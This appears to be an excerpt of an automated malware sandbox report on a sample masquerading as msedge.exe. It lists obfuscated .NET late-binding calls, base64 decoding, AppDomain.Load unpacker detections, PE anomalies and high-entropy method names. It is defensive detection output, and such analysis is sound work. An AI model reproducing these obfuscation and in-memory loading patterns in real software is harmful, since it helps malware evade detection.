                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.JqVuYg6hxaBUVcsdVfq2EcFAGccAALAx6cfCplGgUYZBCMgZ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX._9U7OSAq0RXDPzWAZjnggVkY6KqaW8cEJGr3VqC6YPwEJiLQu,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.m5CbZCym8joy9FHkIHwTq3Abm67Rn11rdkK3Mm05MdF6FmPJ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.eBo3ZLkgXek59acgYzOPhGatYL2GzfbBwmHN7fnlTJYIsq4G,_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.qJPD6VozMzwU00SkOvlrAxbO1xXiBnr9CJYEOhfpofh3s4nRMuIi0qdgXAeQfcmp5HrP5QWtcP8mTPYuZNVTSOZxVsA6sB0CE0()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[2],_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.awtX9wwH9SKzlYTJgmPpqssvVZpVHXTwSNAIlhI0ArefAyH1phkJcYETo4nSdcIpBj9bIoqVMIftQAfrAVj0TglYcljvX3d21W(Convert.FromBase64String(UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.JqVuYg6hxaBUVcsdVfq2EcFAGccAALAx6cfCplGgUYZBCMgZ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX._9U7OSAq0RXDPzWAZjnggVkY6KqaW8cEJGr3VqC6YPwEJiLQu,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.m5CbZCym8joy9FHkIHwTq3Abm67Rn11rdkK3Mm05MdF6FmPJ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.eBo3ZLkgXek59acgYzOPhGatYL2GzfbBwmHN7fnlTJYIsq4G,_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.qJPD6VozMzwU00SkOvlrAxbO1xXiBnr9CJYEOhfpofh3s4nRMuIi0qdgXAeQfcmp5HrP5QWtcP8mTPYuZNVTSOZxVsA6sB0CE0()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[2],_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.awtX9wwH9SKzlYTJgmPpqssvVZpVHXTwSNAIlhI0ArefAyH1phkJcYETo4nSdcIpBj9bIoqVMIftQAfrAVj0TglYcljvX3d21W(Convert.FromBase64String(UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.JqVuYg6hxaBUVcsdVfq2EcFAGccAALAx6cfCplGgUYZBCMgZ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX._9U7OSAq0RXDPzWAZjnggVkY6KqaW8cEJGr3VqC6YPwEJiLQu,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.m5CbZCym8joy9FHkIHwTq3Abm67Rn11rdkK3Mm05MdF6FmPJ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.eBo3ZLkgXek59acgYzOPhGatYL2GzfbBwmHN7fnlTJYIsq4G,_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.qJPD6VozMzwU00SkOvlrAxbO1xXiBnr9CJYEOhfpofh3s4nRMuIi0qdgXAeQfcmp5HrP5QWtcP8mTPYuZNVTSOZxVsA6sB0CE0()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[2],_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.awtX9wwH9SKzlYTJgmPpqssvVZpVHXTwSNAIlhI0ArefAyH1phkJcYETo4nSdcIpBj9bIoqVMIftQAfrAVj0TglYcljvX3d21W(Convert.FromBase64String(UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.JqVuYg6hxaBUVcsdVfq2EcFAGccAALAx6cfCplGgUYZBCMgZ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX._9U7OSAq0RXDPzWAZjnggVkY6KqaW8cEJGr3VqC6YPwEJiLQu,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.m5CbZCym8joy9FHkIHwTq3Abm67Rn11rdkK3Mm05MdF6FmPJ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.eBo3ZLkgXek59acgYzOPhGatYL2GzfbBwmHN7fnlTJYIsq4G,_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.qJPD6VozMzwU00SkOvlrAxbO1xXiBnr9CJYEOhfpofh3s4nRMuIi0qdgXAeQfcmp5HrP5QWtcP8mTPYuZNVTSOZxVsA6sB0CE0()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[2],_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.awtX9wwH9SKzlYTJgmPpqssvVZpVHXTwSNAIlhI0ArefAyH1phkJcYETo4nSdcIpBj9bIoqVMIftQAfrAVj0TglYcljvX3d21W(Convert.FromBase64String(UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.JqVuYg6hxaBUVcsdVfq2EcFAGccAALAx6cfCplGgUYZBCMgZ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX._9U7OSAq0RXDPzWAZjnggVkY6KqaW8cEJGr3VqC6YPwEJiLQu,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.m5CbZCym8joy9FHkIHwTq3Abm67Rn11rdkK3Mm05MdF6FmPJ,_0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.eBo3ZLkgXek59acgYzOPhGatYL2GzfbBwmHN7fnlTJYIsq4G,_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.qJPD6VozMzwU00SkOvlrAxbO1xXiBnr9CJYEOhfpofh3s4nRMuIi0qdgXAeQfcmp5HrP5QWtcP8mTPYuZNVTSOZxVsA6sB0CE0()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[2],_3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.awtX9wwH9SKzlYTJgmPpqssvVZpVHXTwSNAIlhI0ArefAyH1phkJcYETo4nSdcIpBj9bIoqVMIftQAfrAVj0TglYcljvX3d21W(Convert.FromBase64String(UE0TPOEfEtXYb36upxT4ctn2b3a6f3yd32a9sAIWHZakmlowGwIs0Qb78SQdgpgO3[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      .NET source code contains potential unpacker
                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c System.AppDomain.Load(byte[])
                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL System.AppDomain.Load(byte[])
                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL
                      Source: 2.2.YgJ5inWPQO.exe.1d8a98e00a0.1.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                      Source: 2.2.YgJ5inWPQO.exe.1d8a98e00a0.1.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c System.AppDomain.Load(byte[])
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL System.AppDomain.Load(byte[])
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL System.AppDomain.Load(byte[])
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.cs.Net Code: VtxkYNl9pd3FHB9P1lmdqyYaPJPYBixu3cPG4vqlbJeJCA6B8W8dvvTN3qI4UOkdL
                      Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
                      Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
                      Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                      Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
                      Source: python313.dll.0.drStatic PE information: section name: PyRuntim
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeCode function: 14_2_00007FFB498D2830 push ss; retf 14_2_00007FFB498DD837
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeCode function: 14_2_00007FFB498DA272 push ebx; retf 14_2_00007FFB498DA282
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeCode function: 14_2_00007FFB498C00BD pushad ; iretd 14_2_00007FFB498C00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFB497AD2A5 pushad ; iretd 20_2_00007FFB497AD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFB498C0952 push E959E5D0h; ret 20_2_00007FFB498C09C9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFB499976B6 push eax; ret 20_2_00007FFB499976D1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFB49992316 push 8B485F92h; iretd 20_2_00007FFB4999231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFB4978D2A5 pushad ; iretd 27_2_00007FFB4978D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFB498AC2C5 push ebx; iretd 27_2_00007FFB498AC2DA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFB49972316 push 8B485F94h; iretd 27_2_00007FFB4997231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFB4979D2A5 pushad ; iretd 30_2_00007FFB4979D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFB49987BFC push esp; iretd 30_2_00007FFB49987BFD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFB49982316 push 8B485F93h; iretd 30_2_00007FFB4998231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFB4978D2A5 pushad ; iretd 34_2_00007FFB4978D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFB49972316 push 8B485F94h; iretd 34_2_00007FFB4997231B
                      Source: msedge.exe.2.dr, 7l8EMvCZIQ2S6SCCgLjAUPV321xi9u2lG1TN5rcaiwq3jJZsmcdPp6QQZ4JfjN1Ag3iJhVbD2EMEm6iDuAiqQJORTJjKZlvtxR.csHigh entropy of concatenated method names: 'yLkA7Q6Kyqbf7JvABMuLJlGQe8lXA3ZPaGTzSUgq5myXaKtbYNc1F1R2xNV3eEzAlxyWWPMje4ZJsYtZpjLrVxKSGiuKErxdsn', 'ay9gvxX2nAR4xs0fZMBlmfecS4kM3MYsQmE9WDNd22SUfcckNmdsM5odOJqICEhy0b09DJsHYNjHvYltdHpSlt54GW6CuF8WAB', '_5YcIPTAaHluO4yNnj1vfBwQeeNmkoH8nMKzc2miNJESRx3WzOFaUm6KbQZxYDPbWr6QC3mZ817QCFOLaIzodRe6n9dZY62II0e', 'iM7MRft4gonQkd1M5Ag3RkMRz', 'HtI7DCm94hvxdFS3tcCRfjP0B', '_1eROfC4OTQkqiqLLg1UaTC7I3', '_86uYvfHoynkvtwP3LC7jNqL5l', '_6H35GECqxSX36OMFsHk9b0JI3', 'ivyvL9KeLSbyFYPNQl8bu5OCL', 'f6NSBWBAVbEsBxXbShNY8sAKQ'
                      Source: msedge.exe.2.dr, 0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.csHigh entropy of concatenated method names: 'yh97aflW3Y6Oc6EMOjb8igXrFuDjxnyJ0g4ZgemCPK25C6B0QkVCKz6gXmErE8EFiJzZ0N8KwuSddeiSIei', 'rmFFrLm9tg4sqGbwwV6wTFNfANZqh2jmSbI2T7KIFdXYBS7NZ76YUuWieUDCGxfu2uFIFSqI7qJbnil5WPx', 'JeYM41efdgM3xEeo83K8abrLd3xT9Zka5PUghZeANQraQFGzVzGwZlLjFHekTIjUpXPGUzOHAaa2hss6Ro7', 'jl27VKGuPbY6Vv50dLRBg9PHurocMlRz5UXO3avvvO7g7hGGaRW2xiPqgqgoCagbW6eFOJmnmTsQ9BFvKki'
                      Source: msedge.exe.2.dr, Aa9DO6wWMfkvbFA2SI9y58lSPZNgXOk0nlHGYdR5geCe6PSZ.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rCym4pGH0HfiWYMDkatZ4jDgtzxGrNwDeTdN4AGeR6ampuEWA1uJoNCe2HQqeMQKzjbNL0umb0ads4lHF7iR7rf0fDHQ6fYZv0', 'JnGcaPLk9cEe8ZtNdeKwV2NmbQK9NjtMQBcABUh7rA69kc63UMML6mEBixCWcCQlpNcgcRT7vTtcN98dMooYPV7JU7l3n98uBC', 'za8iXzabtj3LOTES9ZUroK4B7VbEXqHLFSddlabg9rmqfzeJxAwwU5fprAWHSYoqtTdLDLf5wWhhI3vRLVOpCx10SD7ZtcrfHV', 'AxG7nVOUs64ifgghu403q6JlFTkHiMAxg7JlRR7C6BUFS8ABLZGfAPgje1VNGD0I4tt1OhX6t7jmBvnVXZc'
                      Source: msedge.exe.2.dr, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csHigh entropy of concatenated method names: 'QxFWgAZfropbgmTO2hlzNsLzVeiewHGUSf6EW3Ffo7mQohnn3sFEtKyn58ywLDXZp', 'E7gTS6aZOBUjrnjWkRovirs5GQMP6vDANNiXNCsHM9XKpdpCSi9ySH4h7LWHV17ED', '_5GEPL5zXkhE1GjOHoZ9z63pfIV85JvFLlvj9gixiODSRnurpPHLDzOHVFbEEno2RavWF3fIZEn3SxJ98u2njqTFUddgst4LRcj', 'ltLJ4u6QrOFoSub4MAJVSYuaDhMwbXPSGDBGMy2ZbRxsYrLl16uPhdnTP7agf6Hm1vk8YnSCaVCsMp7KpjatND9rWTQO8huXyA', '_11e6MCzhNjt9fkdjoEPblcMuf6aFCMPVhhBUVA7Yqvey60iT4Z9rQiGfXtUSY21UXDoLmcm6FQzqjjhT443rzH1lHfGBRaJtHO', 'UZ4u6YhLiNmOQFhZub8hA81xnXuvc2Ctomxn0gpupTthP7ZmB0HUwan956IvJfW7zg9wrIOHlikLJ3FTJAQFthekemjXyhQSnf', 'DwGMdcgm3qHTRgmWo7sPJ5n0mnmEW2Fbc5oKL6LmvH2Z8Na3KvToLZPvhJoAOw3kTLi0O0Ocuxf3rowAAP7q2aqOBC16LpYOTX', 'zgdeUfZxN9ppsoOeFNMwd0uvrXzumzUexYDqje8VufRmYDVO4UqBdeQkKXZkwRFlpgusfVbxqelmm0C6pEM5PlxKogt9n60CKN', 'vmcqjfch5uiAiPz2xYdQXmk3uqbYmRKT6dK6XpFJuqu89T7ov0Xj6xsWrH2HieBkeuyBpMScrGzeRWxPDV4NyMWMaDCOXmtZWS', 'psQx6sOJNixtwH4cosuDJVM8w3hj7T7nEmPV7UZ3P0QeICadwisrC4VZPDfXPAwqXopYgZttuwQpzBkWaQ9QBphkKlg1T2YCYC'
                      Source: msedge.exe.2.dr, 0z3ZIhpJfhq2njFq0TTjg8sopVsEWVPb24mSwU4g0QL4dxjF7JdE4QOgJ40VPuiaU.csHigh entropy of concatenated method names: 'E7pAEoTZL9Spl2tY5dP9it8wxhZikXrxarMTkvT3bAO1JmNjM4DEjCrAFEf4C84Hc', 'sK1EMIEWy94QUVp8dt4NMb7nE', 'Bq3KY2TNlgepk2nYwWvgaeox4', 'ZATUsFwMG4tcqp3gKEA66w1O0', 'gqFJHjU2OILeYa5BRaqNA1D5k'
                      Source: msedge.exe.2.dr, RCU77fvzQI1bW3Vpo5QsIuEOnvacINkd41Sdukon4zQhdO3pwSwv0DKGBQDlkhLcC.csHigh entropy of concatenated method names: '_3S6hTXFysXlTNpxkpMjvWho3Xij3a1thIBgoyfGVtVa8vLSxdMJ4mTU9fHTeTpyaT', 'SH8BPXlVdqfTpfr0dXzAedp0Owyt8vQ5aQMzLkLDknEZIyP3wSWkTb4T9OOH6Rmwt', 'ujmHtkgyBcc340ZUYJd4ZwSHR9s75HBDcR02joVkumogehguuKmJcNwp2ARZ7Y2eU', '_8uLtrjXyCbOf5PZIQ3NOJ4dW6qSMOwuWamF2lDNy5dLn7CpRI4gwrgv5yrFxfx0cG', 'WNpZKzxqLOd7RnJuNXtrbOscx', 'j0O4pInvmClZbk6eGgGhDPkt1', '_27UGHbqGtAnPYozHgin2IxY2o', 'mP1PQHbMcqYgF7rcX92WxSnc7', 'UuSZA9yx6NwCF7bdQBlSE92eY', 'gV9BDwFy83190WOT9KtIpLVbQ'
                      Source: msedge.exe.2.dr, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.csHigh entropy of concatenated method names: 'lV8yfxnNOUZBrm7CCVAOCkMBat7ri85PfdsuSOkvPZ6T1pNFM5pGl9OqquNozdUuZRnBAVVMyRaaAMEB', 'Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c', 'pMFZ3PfvjSoGzkxKDTIiEVsgD2oSzxmwy9iQcZIMjWaqwi23XuiTTKhoEu57SkzeNCkbcY2b8FxO5Mvv', 'NH7YFiUOc5O0NSPvuPKD60ETIJxA3xnxfVXgRvMOuDvL2ZGrLviNQ6KOb50AX6b8G4oMPQm6QcuJNFxc', 'XqsUtRgXgobAukbBF3YrZRWuvN7k9mQQ4UTQuwGRKzndvPcxpUcoFtGYOFhERsAzBV0sYIi73FysSCpP', 'ehmlzl9HRbOhC72a5QblVNPKttoeTJGt58GLWCcJwFc9tIA8JMLTR7cC8fo2z59e5Elbdoq3HBIm3JBF', 'cVa88cKP4KxJbWe1wHxvup0fb40DrVPdG6MU4DVPRDtMslX2XHJVQLch5LdVStxVr0K7OWr7ZAvma7g0', '_6n7p7xcfkpxVJHGWtOAgEauvhKq6iFar1EAuBxNmilpE0I6s4OTNZGJI6olsxtYtouxQOyuB1NLvYxsM', 'gdyqhq6UGMGDaSA4E3FKviLXlri68bwhigKwBd09U3mJhDdd8EFiyXjYk7v0Me4p6', 'qBmNnXvTbBv0CeX2VcO6Mx2b2hi1FMYkpC0aLANmj0fjIVVdNBTGzIXF4qZZQC6is'
